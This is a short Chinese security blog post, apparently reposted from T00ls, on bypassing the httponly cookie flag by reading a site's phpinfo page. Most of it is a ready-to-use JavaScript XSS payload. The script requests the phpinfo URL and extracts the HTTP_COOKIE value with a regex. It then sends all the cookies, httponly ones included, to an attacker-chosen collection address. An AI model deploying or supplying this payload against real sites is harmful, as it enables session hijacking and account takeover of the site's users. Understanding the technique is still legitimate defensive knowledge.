【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

  • A+
所属分类:安全文章

【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

在php里设置了http-only可以禁止JS读取cookie,但是phpinfo.php函数中包含带有禁止js读取的cookie,也就是说,只要找到phpinfo.php这个函数,就能读取cookiele, 前提是要有phpinfo.php这个函数, 一般来说,设置了http-only的,都有一定的安全意识,很少有出现这种phpinfo.php函数的。



【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly


模块代码

function createXmlHttp() {
    if (window.XMLHttpRequest) {
       xmlHttp = new XMLHttpRequest();               
    } else {
       xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
}
function getS() {
    var Url = 'PHPinfo的地址';
    createXmlHttp();
    xmlHttp.onreadystatechange = writeS; 
    xmlHttp.open("GET", Url, true);
    xmlHttp.send(null);
}
function writeS() {
    if (xmlHttp.readyState == 4) {
     var x = xmlHttp.responseText.match(/<td[^<>]+?>_SERVER["HTTP_COOKIE"]</td><td[^<>]+?>([wW]+?)</td>/);
     if (x){
        var url = "自己收取cookie的地址" + x; //x 为带httponly cookie的所有cookie
        createXmlHttp();
        xmlHttp.open("GET", url, true);
        xmlHttp.send(null);  
       }    
    }
}
getS();




【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

本文始发于微信公众号(T00ls):【奇技淫巧】特定情况下phpinfo获取cookie(突破)httponly

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: